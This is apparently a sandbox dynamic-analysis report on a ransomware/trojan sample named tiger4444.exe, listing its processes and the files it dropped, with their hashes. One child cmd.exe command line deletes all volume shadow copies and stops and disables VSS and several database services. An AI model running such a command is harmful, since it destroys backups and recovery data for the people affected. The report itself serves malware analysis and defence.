25a61cce...a451 | Grouped Behavior
Try VMRay Analyzer
VTI SCORE: 100/100
Dynamic Analysis Report
Classification: Ransomware, Trojan

Monitored Processes

Process Overview
»
ID PID Monitor Reason Integrity Level Image Name Command Line Origin ID
#1 0xda8 Analysis Target High (Elevated) tiger4444.exe "C:\Users\FD1HVy\Desktop\Tiger4444.exe" -
#2 0xc04 Child Process High (Elevated) cmd.exe C:\WINDOWS\system32\cmd.exe /c @echo off sc config browser sc config browser start=enabled vssadmin delete shadows /all /quiet sc stop vss sc config vss start=disabled sc stop MongoDB sc config MongoDB start=disabled sc stop SQLWriter sc config SQLWriter start=disabled sc stop MSSQLServerOLAPService sc config MSSQLServerOLAPService start=disabled sc stop MSSQLSERVER sc config MSSQLSERVER start=disabled sc stop MSSQL$SQLEXPRESS sc config MSSQL$SQLEXPRESS start=disabled sc stop ReportServer sc config ReportServer start=disabled sc stop OracleServiceORCL sc config OracleServiceORCL start=disabled sc stop OracleDBConsoleorcl sc config OracleDBConsoleorcl start=disabled sc stop OracleMTSRecoveryService sc config OracleMTSRecoveryService start=disabled sc stop OracleVssWriterORCL sc config OracleVssWriterORCL start=disabled sc stop MySQL sc config MySQL start=disabled #1

Behavior Information - Grouped by Category

Process #1: tiger4444.exe
8962 0
»
Information Value
ID #1
File Name c:\users\fd1hvy\desktop\tiger4444.exe
Command Line "C:\Users\FD1HVy\Desktop\Tiger4444.exe"
Initial Working Directory C:\Users\FD1HVy\Desktop\
Monitor Start Time: 00:00:24, Reason: Analysis Target
Unmonitor End Time: 00:01:00, Reason: Self Terminated
Monitor Duration 00:00:36
OS Process Information
»
Information Value
PID 0xda8
Parent PID 0x860 (c:\windows\explorer.exe)
Bitness 32-bit
Is Created or Modified Executable True
Integrity Level High (Elevated)
Username NQDPDE\FD1HVy
Enabled Privileges SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege
Thread IDs
0x DBC
0x 2AC
0x D10
0x DCC
0x FA8
0x F9C
0x F7C
0x EE8
0x 9E0
0x C04
0x DC8
Memory Dumps
»
Name Start VA End VA Dump Reason PE Rebuilds Bitness Entry Points AV YARA Actions
tiger4444.exe 0x00010000 0x00057FFF Relevant Image - 32-bit - True False
Dropped Files
»
Filename File Size Hash Values YARA Match Actions
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\base.js 1.22 MB MD5: 66de2827d924ba8ca45ac2be35aa5a4f
SHA1: a31f064f54a1c9c43313227735099ab850bbda10
SHA256: 1d43c2d59b9855e26ad50a0b759495bb145a4d856b7b5b460dd807f9e3fe0270
SSDeep: 24576:OujMR51cpVTCjZ64EkfdxpwLlqtZzCzw73AGwNyIPvz9pkTY:OujuSmjZmI79SyavhqTY
True
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\js\ui.js 2.91 MB MD5: 92afa234edb059602758143a128b4e2b
SHA1: 87353f2f4dd111da34fe179e03807a8e059851f1
SHA256: 75241056e91837218a99d6f9809cb9aaaa811cd35b762ee6db05b46612c9f23e
SSDeep: 49152:kqQIdTZBnejxMJdLLzDwu73gyEQEoXcnzrSDRMrfgti+DAbPJp5SuJJKeSKFM:LQwl0mJd/H173gyZXoSDGh+DAbj5BKeW
True
C:\Windows10Upgrade\resources\ux\default_eos.htm 55.31 KB MD5: c19c0b230ee25bd14bc735cd4b443719
SHA1: 9b1cf04edd423ad2ba8262cdbb5eba2144a1e168
SHA256: 7ed1269bcaa5f607fb774790dda788048ffce6b5b0f166b3ede76b511c5b007f
SSDeep: 768:KS4hRPIb2U5BuJtqMTaB35tXvvRNf0qD20bB8fhdfc5FRlh2sR/+gK71sjFv/yQA:wAn7DWaLtXbfDDVB972W/+gPFtta
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ar-sa.htm 108.61 KB MD5: eb8e910731ca7ee08294534995e7db5a
SHA1: 277112c2d2c71b25e87e1bd4b4621b52b59f806e
SHA256: 6cbaff6dd265a122f8a14135982e53ea219e0c8fa8546e48b04310ad838a9272
SSDeep: 3072:I1Te/U4g8MKu4zoIujmrBiav3g6C4XOQVwebrmu7ZrBlH:I15ZVITrQw+QtbrtjlH
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_de-de.htm 69.56 KB MD5: ab19e29c07c4520f8cfa962aa03aae97
SHA1: 42b39ae4ca0e403ed78a83c99c00f954946aae55
SHA256: 808b31f7bf34a52687968e5b39e8fc311c4ed2fb060414445d0f9ab11e681529
SSDeep: 1536:3nVVyTZ83GXB/O8YmtWtGz1HgFuII8mJwoxKnR26:3nViwy11Ym0tFFuII8vxnR9
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_en-gb.htm 57.94 KB MD5: fc4e53a3e33231b8a3f5edfd7732b364
SHA1: c587828a5c662b54ebb8abe4e30919871cd3677a
SHA256: 2197fe7cd040b03fa10120adfbe181961b8de3ccadc9e000e00470cc26d50a1e
SSDeep: 1536:AOZ0zuogonKAadgVploZwQK4bX1o5Zs7mVKz43:AOZCuoguKAadgVploZwRcyrEI
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_es-es.htm 68.94 KB MD5: b42e137935f05f36db65efe7a1dd37ef
SHA1: 76753d94299396525a6354735be896101265f27a
SHA256: 81044681e046f07f0361663b417b825d7ab9ccfe9cd9311d3c91247e76337b77
SSDeep: 1536:fO95Cvv4+tXKSwT5RG1pDdidjZetijHXIY4NaobxuZbUz4Pe:Pv4+xKB9RGHsdjZPHYpAoEUz4Pe
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_et-ee.htm 62.38 KB MD5: 1c311eed40018b734d875dc020f48cc8
SHA1: b975f5efdf7587f5b12b4450965022f38b8e3e1c
SHA256: 7323dff38177d55857bd55a3dbdc20901f4a092d56f5233ec7000fc69be7ee00
SSDeep: 1536:/DSEqIdpdCqNXngJYIbuuTvoGIOyFFcuf2Mzj0Ecr1:/D3pdEaI6abUyFMMN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fi-fi.htm 69.84 KB MD5: 581c81e3f55f7918355a085e5388506e
SHA1: b32b0c78ba31e994d4ef868996c82e611d9d52be
SHA256: 7f7ca9a0134d485ff4b42fb5e46f195819a7569cd4ce86c0ad73032ab53eb4d9
SSDeep: 1536:T/ctOoZQXrmnleeuYCZIroWfXVfDlHYqW+e6KfMsRWM:T/51bmnlevY2DqVfx4qW16K0sRN
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-ca.htm 68.52 KB MD5: b8989db8d65e7f48b7fc6df8e0648c1c
SHA1: 610f2f84f27f753ad8f34b56668163ba87c0d6c6
SHA256: d2c08f65766b5457a236a9d0a116f813538d6c16f3ff762807ca43c08593aa3c
SSDeep: 1536:SvK/7cxPCS03Z03LBOj8wW3h6cIyH9iAjdq9nhtBAB2RrIub:SvTxy3Z4h9H5dWco84
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_fr-fr.htm 68.52 KB MD5: a204392c00cf95d91160865ea0c3db91
SHA1: fb16b9c86b0209e2387c97c701dad9508524a909
SHA256: 676d9b6629b1cf4eeea00def9a8ec15a358840800bd69c2e83f150aaaa97e669
SSDeep: 1536:0FSBYZprRLo/Jm7iOO1et+ofRqNiPHaTRQFQPjcOi9lSGi:NBQHriOO1DofnyJPjcOSSX
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_he-il.htm 845.14 KB MD5: df4313d931a8b6ca0661efe542f17635
SHA1: 79b43c7c3b390de435cef7a18fd2cb45f2bfbfdf
SHA256: 8fce226fef5a365b36d38cd26618e425dfc8a2503316d8c59bfc3cdc7cd28e00
SSDeep: 24576:XHMhtz2/3YgznbGsTqqWrA0+MrG4y5JCpFJh:crzeyCqaL4OU5
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_hu-hu.htm 83.34 KB MD5: e3657a30677ff8a172b26b09c98fe095
SHA1: fde142087f0ad676ca1d4fe6365c79ae0b1b3706
SHA256: 9b7e8a8e79e1f34278c0bf0dd139cd06a6b43e930c02ad38b68ae3033a970b22
SSDeep: 1536:P9Aj+QzR6TTMwTk7gVtAcARXVD1EbP+/SqRVEx9OWc9hQuWZHSBeDh09xcNWCVwG:GzOfk7gVtXuVD1EgSqRuLc9sZHvF03jG
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_it-it.htm 68.61 KB MD5: c800df2324717f33c95b9ce041930cd6
SHA1: 10b13e886ff09b0fb67c577a3d8812486089bba3
SHA256: 1a5ae0cdaf02ac5864472b26dc0d4e0d58ac9125f75f4420660fc5a72525618c
SSDeep: 1536:vDahRuNFMandmB7hvx3h0GX/oA/EwcpH4gDUf3W7aDMsVi1cF/PVrs:vDahRQndU7hvx3h0GQ7jpH4gDktM6i1R
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_ja-jp.htm 206.08 KB MD5: 548ceb01932796294656243c44a27adf
SHA1: 406ebeb66752aa063a240827dc15892a78226a0d
SHA256: bba5cbdb2fc913bf0de46f0a67c0136138302578c13703520c4ce9289872ff60
SSDeep: 6144:zQZuA6PlrzwnGtvfAinC41oOpcHGOdaImHO8xL:zsuAhG9AMh1nSvsImHfxL
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_lv-lv.htm 82.70 KB MD5: f0b5bea6bd35a8a9fa354fe81f215988
SHA1: 41a3c8391519a1c45063d440e6e0313c29231e17
SHA256: 89ade2456b19321f667b0db94e8b4f06ec501479f37c1fffafd9b578d4750a95
SSDeep: 1536:OkA1icLnkglVxiyxw1f9/n4X7UvCIekojou8AI/B1SCcAA9azB4RkLglXZ:OrwGinflp6BjzmkCcAA9azB4RSg3
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_nb-no.htm 66.38 KB MD5: 547ca47c3424790a6b230cb60849c0a7
SHA1: bee738f54c45d251d276840463d6e29c4359d6bc
SHA256: f978acceb0e1dc40fa54969814b7bd0d839da03770d17d8b977ab78719aabbf8
SSDeep: 1536:XvjVqESX238GpbdM5LNm+q+jVJVtHM4YuE8dSB/wmK/jOcrirkk5q2lwK:/YI38W+1tHBEomOjOcriV55
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pl-pl.htm 80.66 KB MD5: 83ea0f2c277e115235e34520ad446bec
SHA1: d74f8a2c9e13cc6bbc123970dcbd0b499660f360
SHA256: b3f795076851c03b7387af405d6f1a9767b8bbaf438d1ed0ebad8629d7ecebbb
SSDeep: 1536:5/2H9q2zyz1NY5GgaFUIJHmA8Lmg9I4pEC+bS9kpJH:5s9vQNfUIn6meI4pEPsYH
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_pt-pt.htm 70.14 KB MD5: c606ad05e49bf6104555bbdd14970ac6
SHA1: 20f81e6ae5c40470ea8abff1650d35ce4fc65905
SHA256: 81a6c1fee296c5fe97f72239d43c176736bad9b084588e1794a3a1f79b0029ea
SSDeep: 1536:igdTQ5K/1qQWz/KmSmsHBRpaFVUgKRvcGj3LmpLV67K:im51qt/I9Rp4SD/j3LCV67K
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_th-th.htm 248.95 KB MD5: 8aa1730f881eaa19f7104165f5a2be79
SHA1: 58d7161e5fd5171be6959ede0660c2929cc7aac0
SHA256: 842cc8fda7e5dcb1c09ef696d6805885adc37b828a52b82752ebfec057e8dce5
SSDeep: 6144:fyTDsqeeA4MDduIuZhrgwM/SAIRXtdeGtN5wgRUXLRiO:KPGuIFwMKAk9wGt3wXb
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_zh-tw.htm 144.45 KB MD5: 2be22e56d2ce1e8683d9ff1ffc80b343
SHA1: ff8fafae1bca7e016224106d00d264587201baa5
SHA256: cf06d014fdaf9c4a9b61b30b2d73c5d55efbfff107909a991c82391f72e562ed
SSDeep: 3072:7rI3Zg8Sm+gA56LIsTgb/wsoK9JHlcYD/EUn2ILqG5n+gtdhEbDJK:7E3Zr+VwIs8b/wsDlqYD/KIq2nDEDJK
False
C:\ProgramData\share\.BFC0E91B00AE8A0620D3 980 bytes MD5: 8765f2e4b9810f65980d616455ac6d10
SHA1: 5700adba42b352da9402b5a63e952d87ffbc86fc
SHA256: b559a135a639ad8220361cbdb9f19040f78dc8acb7691715007a6010968a473e
SSDeep: 24:lO0huIV5NcyFC1gCfYoyU1c6px44Ja805st:pjN/FCGpoBrRA80Gt
False
C:\Users\FD1HVy\Desktop\ids.txt 1.04 KB MD5: 08f02340a5d782d4ea71a320aac69ab3
SHA1: 60149b00eab0ce81e77cfebde971f822d64098b2
SHA256: 4ed8e89de4c8a079ab31c736568c395910a45e9c65c5567fd2de860b29bf6baf
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771Vvn:XVWv1rQ2u5aRMtc77Dv
False
C:\BOOTNXT 784 bytes MD5: a2c7b20c507181ee6d2a655f966596f7
SHA1: d69b38dfdd5076d54db6ad89da11a35c3992c429
SHA256: 5d0dba91b1b55be77141342246f7c439c51affe6dd73c2ca68b12517405851c0
SSDeep: 24:bWvb4tsquFix6VN/r1+JO7ad/gv6B5z67c:bA9quY6Rr1kO+6zo
False
C:\Users\FD1HVy\Desktop\ids.txt 1.08 KB MD5: 9bb4a6d88465e076661e035411f39a57
SHA1: 6d4309e6d1ddf7bab244d229ad41e2f190629192
SHA256: 575a5403fed335f9f99de3e1d04ec337580bb3792414f89bc8e32f5bc55bf1c4
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJs:XVWv1rQ2u5aRMtc77Dxs
False
C:\Users\FD1HVy\Desktop\ids.txt 1.13 KB MD5: a79f54e61062fddaabc50c17a75749e9
SHA1: cfc7d463319bf5ac07d1b8f7891d321ba48ab267
SHA256: 95484f22e1b9c99b3708888c7376e4715dc6f9f4ab263fbc480fbd209ed14316
SSDeep: 24:8UH48VQrbA2rcIANQBDx6r15aRr1qtVi771VvJyC:XVWv1rQ2u5aRMtc77DxF
False
C:\Windows10Upgrade\bootsect.exe 116.45 KB MD5: 6e53fc6aab240b1f6d27965d2de44595
SHA1: 42046ed252ff485be9aff59897d756b1a00250be
SHA256: 09ffe2bd203b4f40726a03c9461746bb1535d58b097c88aefcabc9ca6622020e
SSDeep: 3072:x/Sktl0QkB3bmvwOejXGijvSaDkjjCL7R1nyvTS20:YKkB3bmYfdkjCPAx0
False
C:\Windows10Upgrade\DW20.EXE 629.45 KB MD5: 5816183311305833f451c70355fe0212
SHA1: 05815d14449a2ad94156e30e2b7e602eef283658
SHA256: 8bf05a1ffa0f1e18db6ab03652a35b99802a5f98700f1c4532fdcfb9cb896306
SSDeep: 12288:CaJCSfFOszoD1E/Kw4nZzOPfgXfjL+u11rAPxk29:LFOszY1Zw4Z6PfOfv+u/EZk29
False
C:\Windows10Upgrade\DWTRIG20.EXE 45.45 KB MD5: fb6bb3dbd49d3f65cfe0493e094c8b35
SHA1: a4d0b0c57b78e226ddf5b0d454bfc31622af53dd
SHA256: c7c6a24aa22cc77a41b78844b5ebbcb9a1d4afc133e2b641a68232e7cdf37fdd
SSDeep: 768:LArv+d5tcsqPm9p/qr3o00yBTDT12nWOSFWwsHzp6akqC5ktkGHw3GgS:8GGW9p/kz06TDsnWlF/2tPLMktLw3+
False
C:\Windows10Upgrade\EnableWiFiTracing.cmd 10.34 KB MD5: 5ae06c6c724054d8b1fdc633460c4b4d
SHA1: e318c3b7d11703ec7cf6a26ae5e3ffb7d1e9e477
SHA256: ca42fc57a8df6f2cae7c94e4b5cc43e94e4dfebc6ae152ace38de5409aab1343
SSDeep: 192:axZ/m7NHTvIDMZjcUloNly455gWd8JLaWaQ5eDkEyl03QnlLhqZle7O0N6WYrh8:xNHTv/tO0y8oX+eSMQldqZMOPK
False
C:\Windows10Upgrade\GatherOSState.EXE 552.45 KB MD5: 329963cb509d27d024fac3cf2aa9e13c
SHA1: 326b405ab3335397cf08429d766ce029de22207b
SHA256: 30c0a49231ef4f86221fa7b1b89bc94e389a9949692db99522b43540b01a16c0
SSDeep: 12288:iMqr/7nMawEiD1QIwZCLUUC4Pg1aWogiZ7OslwL9eF1pIYYNBmD:iMsMnD1L6CgsWo3hwL9E2YZD
False
C:\Windows10Upgrade\GetCurrentRollback.EXE 72.45 KB MD5: 17768f1c2689219485917f57da793fbb
SHA1: 81a6b55b284d9de615c02f913c05ebe6ecada4fe
SHA256: a0fab7f9125cccc53a649b0b5e0cd49a92567e6e7726ed88bca7efdc088eaf46
SSDeep: 1536:apFqln/4ovlTbMSypKiv8YxMGBs1AqNuHrX6o2dTyiFnPXwXVoyQ:SFqJ79Fiv8Ca1hUWo2dyiFn//yQ
False
C:\Windows10Upgrade\HttpHelper.exe 27.95 KB MD5: 5440993116095dd551b35947ac225390
SHA1: dd2818baa32cd6a541f1618754c2e0acc074d28a
SHA256: 90e38cf8253a17ae0dbdd4ed1189e3c00bc3a8ede4250b0d7ef9f69017857448
SSDeep: 768:/TUKLlMEwOropnjpWn1IE8AvIkP62tbCHWnE2Ov:/Tpp/3+SKAAq64ySUv
False
C:\Windows10Upgrade\PostOOBEScript.cmd 1.33 KB MD5: 9131992f277c3e4ed1f65757eb7f82ea
SHA1: efe92e1c0c44b57bdd99643e568c5b7e367c1262
SHA256: 9688ac302a9b89ec91eb8118575749b0f031d1cc3e2371c2cae0d72123f07b2b
SSDeep: 24:BjiWhQlkeakAljF2ZPlcRTRZ2O+W7rkYoj/2fN/r1+JO7ad/gv6B5z67c:xulOD+yTThBr0yfRr1kO+6zo
False
C:\Windows10Upgrade\upgrader_default.log 245.08 KB MD5: 5744eb1a02ce1b0695c012eda605cdf8
SHA1: e3db8bb3ccfb6c789b7c206a6c0d42582d4de489
SHA256: fdad21292de16611ad114257f10fb787732b4f8edcb53080e430215f334b3f60
SSDeep: 6144:CtXnopZqeutTFz0VxdOHAQG4qfDAJXqlxWbyr:copZBuzAdOgQiGk
False
C:\Windows10Upgrade\upgrader_win10.log 20.83 KB MD5: d63b749aeb8d0605e07da2df282bfdcc
SHA1: c73249b866fdc47e32a6adc4e85de33f6134ea66
SHA256: 343f2c99f4d3b152c5eceda1002899c9e0118e8218e53bfc2d9506151e76cd18
SSDeep: 384:9EzveIHc6J3s0BfYRwe0gInujPvoAMNkRX/mz7xNpARg3FgE/7evZ0iGbD:9cjJJ3vOwe0gIatMNYuz7xERg3RzeCiC
False
C:\Windows10Upgrade\Windows10UpgraderApp.exe 1.35 MB MD5: 4f9085c6d66649acdf5e6c08d60e3414
SHA1: 01c25e3f9eaf123a6d150f8e6ffdafc5153a8174
SHA256: 60e18d4e558347ffec4b9660c2d740d277376ed4ef5467853ca629430b5f0b0e
SSDeep: 24576:Axd2lNtZ0RR/iNXE8YA0nidQgiWKYcCB3rrKB+eAc5OtHSYSZOci7ZgU77jzz+:AxYBZkR/DZid/tKY9N3iAc5sSYSZHi7O
False
C:\Windows10Upgrade\WinREBootApp32.exe 25.45 KB MD5: e8f17728458dafda5da90494993f1fbe
SHA1: 37b2f1086096cd4ef4886203bc6e844f0bd60619
SHA256: 5934953db4a2636a2c990d02152517610cc02339fad147a0f31159e038efb697
SSDeep: 384:3hZth+P2fxHtOn4IMmMzjdb8HU0cG470Kgs4qAFNTnufumPupPc55E5xxcnqo6Ae:R7h+AxDzjidcGkSYUNTsusY5XYqlV
False
C:\Windows10Upgrade\WinREBootApp64.exe 25.95 KB MD5: e5ba2246fa772dcde80231164cc4d341
SHA1: 2342888cbffa9c5d8d37e612c670673f133d6bad
SHA256: aac3f6c07affe427047a47924fcb43263505a3f25bcae25bc4d3641d47b47c0d
SSDeep: 384:tZ2/hNyiC4JJJMhgITmd3FgAfkfo14n7nflpgb4K1BlRFuW0m5cE2B9ooUdi0T9C:uvXJJ0Te3iA8i47n9E1BZArz9gK
False
C:\Windows10Upgrade\resources\hwcompatShared.txt 806.78 KB MD5: a316543f9fa3238aeba9c9f4e43949ee
SHA1: 5f3eca03731724ba949ec8d4dfd573794ac33cd4
SHA256: a27481eb04a82ab364b602b4929ab8fa0adeedaac2af0882c99aae31eb4b9988
SSDeep: 24576:WeDkeskfJr179KfK1btfNC9Jv08ZPmIgPDXOiT9BFyS:Ge9N9PY0mPzYeiT1
False
C:\Windows10Upgrade\resources\ux\block.png 1.66 KB MD5: 8861953a8a04290ee655f24751c1e0a5
SHA1: 037ff89b6cc891eab67ed89d32208b6f6ddb09d8
SHA256: d32606cf252f9ad0d757ac0f4bb61d6e6a0721d13bafd141797d656e8c4a85ae
SSDeep: 24:hgJ7sdeBXp+c/zrXP4yH1f+t4xlz+bCWj3RbSh91SJ/God5GLzPN/r1+JO7ad/g0:gZfHuSijlSb101KzPRr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\bluelogo.png 7.67 KB MD5: ad96e400790511a4d5652262805bb8b7
SHA1: 42735fb3399e4d0c1835bfd299d291505237da7a
SHA256: 3b4a1984d0cdabf4817a2ad2df27215ddd7fa31a17fd09ad05d795d52131ccd4
SSDeep: 192:07sCR856RqvE1TtULThA+G4ls9oufPvZYh8:Isv56RAEFyLjsK0PB9
False
C:\Windows10Upgrade\resources\ux\bullet.png 992 bytes MD5: 0533ecff7240b335da566f1e8ad0e3db
SHA1: 3500dcfb709b9350eb7cdc96558ef654c500ca2b
SHA256: 5535c315e5da8bd27fbf97a8fc3c2fc7e1b4186a17061929930562c1d1e86936
SSDeep: 24:Ae/SellmISEEqx7ut/KN/r1+JO7ad/gv6B5z67c:0eitqBu8Rr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\default.css 6.39 KB MD5: baf51b3bc12adce43ee70da962e72a28
SHA1: d2806856dd135096aea057283f6d079f7417278c
SHA256: 14083713881d930dea86fcc0f8fb0a773e2fd0122ecb830b26257a7b080bbf45
SSDeep: 96:Krip9AHQi2R6WiUt4fVma9DHIqIh1FPIDI7CAexvzXCHKAS1J+51kOT8:Kr6YQDRQDHIdFwwC7yY3+bh8
False
C:\Windows10Upgrade\resources\ux\default.htm 61.83 KB MD5: 4eb68b2237e799dc4b4808c3d2f39e0b
SHA1: 4762e1557a1b9e72f0c8be13054165b4c60a8b9a
SHA256: f82872a03807ab0ce39f65b53301274ce63c512f8da430e8fc76f2545029737e
SSDeep: 1536:SOPgYEO4fKC4CS3kQSTvpIXUCpcfcQxaJipQTRvUaZxoCvhtSW:zYYETKC4b3j8RickQxaspQTRvUcaCvt
False
C:\Windows10Upgrade\resources\ux\default_eos.css 7.30 KB MD5: e8faa5c3ef265641ca58e0fbb9113df9
SHA1: acff08636291ee8306d8c363786ea17fe61686d1
SHA256: bc7d79b4c4e8a8a238571de5d96d1786434c166f19893187bd6b6d1ede96d136
SSDeep: 192:PPzRYSPdQ0pmij4sIj7rmNmDx7KKiIpwac+cih1plq58WKxfBh8:PrRYSoijL2mkYIutInqSx8
False
C:\Windows10Upgrade\resources\ux\default_oobe.css 5.86 KB MD5: 059ee6778077a8c99a8dfbca802d126a
SHA1: ed05cccb4c1581e50fd46452d513acf1a4087432
SHA256: 7cc921eee518977e0c326f462c7155808328b02f843167e29a566dee52eb0ceb
SSDeep: 96:Sx5juEiIM1rNVqh7PCkoxAczLu7M1zQFh+jqY9HzDmX3aB1kOT8:5drNMdoxAsTuIzOX3aTh8
False
C:\Windows10Upgrade\resources\ux\default_oobe.htm 64.92 KB MD5: 59abc87d985fbda72aabb3cbad131add
SHA1: 702d11c2d042bb2cb3a522fe8012b0e0bf50d4d5
SHA256: a4db4f15c9a989bb28a23fc9f2954892cac99f654d513a43ea95cf1bdd4e642b
SSDeep: 1536:uWCyE/7JwbmTgvKRsrmFnZcRfGrUa2UBNnamJvfPdmnc:E7JgygCqKFnZWfGrUPUnamJPd
False
C:\Windows10Upgrade\resources\ux\eula.css 864 bytes MD5: c6c73c4c3d311e70de9440f6ec04cac9
SHA1: 9e5f92643edde687506c6ea9395a4bd9f11de966
SHA256: f005abcc854f5a429202e079d6b77c023efb1fa150eed308c3367c6805bcd508
SSDeep: 24:/EblfkwEILU2WNN/r1+JO7ad/gv6B5z67c:MbRTTUTNRr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\GetStarted.png 4.48 KB MD5: aec7145d5916766f3f700eb964a52e8e
SHA1: 253b81c26c2a37f01da712f5ce7932eb2fcc9d70
SHA256: 8809195352b90d83021efce96d94f33433f1afaf69414f4d9eaa172286f0e1f0
SSDeep: 96:wuKuvik3jb+mO05iObXSg2ivbG7IjKMaLSfBf3uPBoR1kOT8:wu/Z9XiAR2ivrDZviQh8
False
C:\Windows10Upgrade\resources\ux\GetStartedHoverOver.png 4.73 KB MD5: 4424e30f7aaa78e1674b923de2f2ec9d
SHA1: 2606c16aa5b8a33a9cc2bb5bdf4880fae8c743b0
SHA256: 091466a9ca3425dee58eb07a612460bea61c8f535d15bbcb35d3c732298a53d3
SSDeep: 96:PmQz4Y5rM9SKz/knZoOchPST+qQ3oGAuqAC5F1kOT8:PREYQSCtPAPiQuqA6h8
False
C:\Windows10Upgrade\resources\ux\loading.gif 17.75 KB MD5: 7079765319c3e09f20908cff91e4c7d6
SHA1: b06e76898b440ef8932a2beb5ccc2217cb2d36f5
SHA256: 2726ef1c17c2464d10f2481f090a12edd16dc12b0d8f3833ebedfb5165482873
SSDeep: 384:bYwKQZYzSXIT8F5mSbRn+NrkrXT+awxzhrSgEX2OdQzriNDV:GQZYzBEb0u+hZwdQzyDV
False
C:\Windows10Upgrade\resources\ux\lock.png 4.34 KB MD5: 81cf2c712db59c81223032269bba0cb2
SHA1: 16309eb11f09a8705803afb5836ad70af3f39d02
SHA256: 844a4aa862dcc891372d7a530858a3059cfe8e6f1c3114176b15bb12dd65fd8e
SSDeep: 96:ErOD30xjlej240oA4TG3TnQglxNlKtm3w/KfGlpoVHQ+xD1kOT8:EqD30xjlej5A4TGjQqxNlK+RJVHQ+xhe
False
C:\Windows10Upgrade\resources\ux\logo.png 3.31 KB MD5: a97ed74d683d154d204350f8168e5338
SHA1: b47337e9e20e5dae660c6d8c058c10548a283185
SHA256: f5e8c21dbaaed16e70070e41b1cacf1ae2cfe7deaf9594ee6564004745f076f9
SSDeep: 48:iUFx25rBedXYJ7XCq2BYCt7wWe+VinYhH3SqjVa4qzDQRr1kO+6zo:ilJv2BYC+We+VinYhC2k4qY1kOT8
False
C:\Windows10Upgrade\resources\ux\marketing.png 1.23 KB MD5: 141559d49968602c3ecc90811ffb13e5
SHA1: 95774aa78577f2e07d1dabd07d0a2d8e03362660
SHA256: 0406b09b8c83a3b2d84a1e0853477caccda866e0f761c841a7403d9bb3dcd9fc
SSDeep: 24:3cn4B7jRAo6GeS3F9Nh9g2A3IiPLCLswh4/N/r1+JO7ad/gv6B5z67c:3o4Bzr3XNzg2piPLW4/Rr1kO+6zo
False
C:\Windows10Upgrade\resources\ux\NetworkIssueFAQ.mht 608.27 KB MD5: ad2f9a91dd52c53e9ae83bd940b95048
SHA1: 1498d3237054599b91c0844e8c407a23b790201c
SHA256: af6cabcfc968be7c0367b1a88a5aa92bdfc10a78ccb0941881a6bde4cd358882
SSDeep: 12288:rusaxZrFa8wjNb3af28VDKmh4CztWPHrdIEXdqsnQ4eXSB9qh9D:vax63j9au8cmhVUrSEXdqsLVBQhF
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnection.png 2.88 KB MD5: 60966ba4663e5e04005acf10ca506906
SHA1: 38d8d9b66e75e081cbc395bc0f06fc744f88f4f3
SHA256: c681d164f1644d32362bdcd7d89ee6322467c1f1c64b718907aed1ebc42615a9
SSDeep: 48:7K5oQ44FoiUsq53QOtPll8gdWVYGjUywXR/ozfP/QCti0vIeahoQPoZRr1kO+6zo:FQ3bqfx8E1VR/orP/ZtTQGQP+1kOT8
False
C:\Windows10Upgrade\resources\ux\NoNetworkConnectionHoverOver.png 2.92 KB MD5: 711a144ab5c5e891282b60611705c84a
SHA1: 7ade146eaff2efff45abf53199858e7bbf5a0a9b
SHA256: d6cc3cb5b4cb21ffa37b67e95ede5d64064cefe9c4e172673452c2fd275bea64
SSDeep: 48:95PIGGK3vX1G3Sy4OrlJTUGbJxxgxBOloHhQ/O6pJV5Nk+hwEz+SWouRxRr1kO+R:9asfsiXOXTFZgxDh8OaJVXvh/CSgRn1e
False
C:\Windows10Upgrade\resources\ux\pass.png 2.53 KB MD5: bcc1f89444d56a9f9d68acf1d8902e46
SHA1: 672c9e0365fbe159eea75abe800c1aed6a435fcb
SHA256: 20e0b119812ebefc0d8438775b6dda95a6e77566f34e3e4ca36b6a0cb6ef9ab1
SSDeep: 48:1Qv02mYvVl78ZbCJANCs7H51gNBAI0sdBt0Rr1kO+6zo:NYv71Ar7H51gPHdBtE1kOT8
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\oobe-desktop.css 40.75 KB MD5: fd06bfac9547c90b39e181a191595664
SHA1: 8535e88c11ec7fedac3a47a0d22990be3a4cd439
SHA256: ce6f86026fded45138b40058cb28a5dd53d4ec6e40f28896dcc58cc555065914
SSDeep: 768:caHc5p9kUQ2RKh9g2tMrfBv145Llq2W7MzyxihyhJgPtaHE:cScj9kUQySx+r5vWvq2v+xihyJbHE
False
C:\Windows10Upgrade\resources\ux\Microsoft.WinJS\css\ui-dark.css 263.61 KB MD5: a4e17466b2f25a4ed1700919b3fa9423
SHA1: 36916d8d3ebe57670230b7233617b68863622e15
SHA256: 8682e98bdeba9313f7c4c2aa5d3dd6778721ca7b59bd32ba463fdd6826c69224
SSDeep: 6144:khuHPnNup9dgiPaseh0J0VXqLZqVJ3hIO0qK1TvB+LeVWHFY:khuH/ugiSsehGiXqwV7IhB5BieolY
False
C:\Windows10Upgrade\resources\ux\EULA\EULA_bg-bg.htm 248.27 KB MD5: fe669f20f8bf3f1d206f2584e6e18166
SHA1: 6fed1437280339e67fe19959c7c760c1424fe966
